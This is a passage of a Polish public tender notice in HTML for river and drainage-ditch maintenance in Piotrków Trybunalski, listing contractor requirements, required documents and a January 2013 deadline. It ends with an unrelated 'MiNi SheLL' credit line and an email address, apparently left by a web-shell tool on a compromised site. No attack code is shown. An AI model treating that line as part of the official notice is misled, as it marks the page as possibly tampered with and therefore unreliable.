<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WYKAZ WYKONANYCH USŁUG w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie (np. referencje). 

Wykonawca musi wykazać się realizacją minimum 1 usługi o wartości 300.000,00 zł brutto podobnej do niniejszego przedmiotu zamówienia. Za usługę podobną, potwierdzającą spełnienie tego warunku Zamawiający uzna prace obejmujące konserwację rzek i rowów melioracyjnych.

Należy wykorzystać Formularz 3.5 do siwz. Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.


UWAGA ! 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonywaniu zamówienia. W takim przypadku w pisemnym zobowiązaniu podmiot oddający do dyspozycji Wykonawcy ubiegającemu się o udzielenie zamówienia, swoją wiedzę i doświadczenie musi zadeklarować swój udział w wykonaniu zamówienia jako podwykonawca poprzez zawarcie tego faktu w pisemnym zobowiązaniu oraz wypełnieniu  pkt. 7 Formularza oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WYKAZ NARZĘDZI dostępnych Wykonawcy usług w celu realizacji zamówienia wraz 
z informacją o podstawie dysponowania tymi zasobami. 
Wykonawca ma wykazać, że dysponuje minimum: 
- ciągnikiem z przyczepą - 1 szt.
 - samochodem dostawczym - 1 szt.
 - piłą spalinową - 2  szt.
 - koparko - spycharką samojezdną - 1 szt.
 - koparko - odmularką - 1 szt.
 - samochodem samowyładowczym pow. 3,5 tony - 1 szt.
 - kosiarką  bijakową - 1 szt.
 - kosami spalinowymi - 6 szt.
 - glebogryzarką ciągnikową - 1 szt.
 - bronami ciągnikowymi - 1 szt.

Należy wykorzystać Formularz 3.6. do siwz. 
Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.
UWAGA ! 
Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WYKAZ OSÓB, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresem wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, na formularzu zgodnym z treścią Formularza 3.3. oraz Formularza 3.4. do siwz. 
Zamawiający uzna spełnienie tego warunku gdy Wykonawca wykaże osoby, które spełniają następujące wymagania: 

KIEROWNIK PRAC ma posiadać:
- wykształcenie min. średnie techniczne w specjalności melioracyjnej lub wodno - kanalizacyjnej,
- przynależeć do właściwej izby samorządu zawodowego.

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.
UWAGA ! 
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia lub innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   	Formularz oferty (Formularz 2.1.) 
2.   	Formularz cenowy (Formularz 2.2.).
3. 	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii.
4. 	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. 
5. 	Dowód wniesienia wadium w wysokości 8.900,00 zł lub oryginał gwarancji albo poręczenia, jeśli wadium wnoszone jest w formie innej niż pieniądz złożony zgodnie 
z zapisem pkt 11 IDW w SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie realizacji umowy postanowienia umowy mogą ulec zmianom, jeżeli konieczność wprowadzenia zmian wynikać będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, przy czym zmiana postanowień umowy będzie mogła nastąpić w następujących okolicznościach: 
a) zmiany obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy lub świadczenia stron;
b) dopuszczalnej prawem zmiany stron umowy lub oznaczenia stron mowy;
c) gdy wystąpi zmiana przepisów prawnych mająca wpływ na wysokość naliczonego podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdik.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZARZĄD DRÓG I UTRZYMANIA MIASTA
97-300 PIOTRKÓW TRYBUNALSKI 
UL. KASZTANOWA 31 pok. 9
DOSTĘPNA PO ZŁOŻENIU PISEMNEGO WNIOSKU O WYDANIE SIWZ (WZÓR WNIOSKU ZNAJDUJE SIĘ NA STRONIE ZAMAWIAJĄCEGO).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2013 godzina 09:00, miejsce: ZARZĄD DRÓG I UTRZYMANIA MIASTA
UL. KASZTANOWA 31 pok. 15 (sekretariat)
97-300 PIOTRKÓW TRYBUNALSKI.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com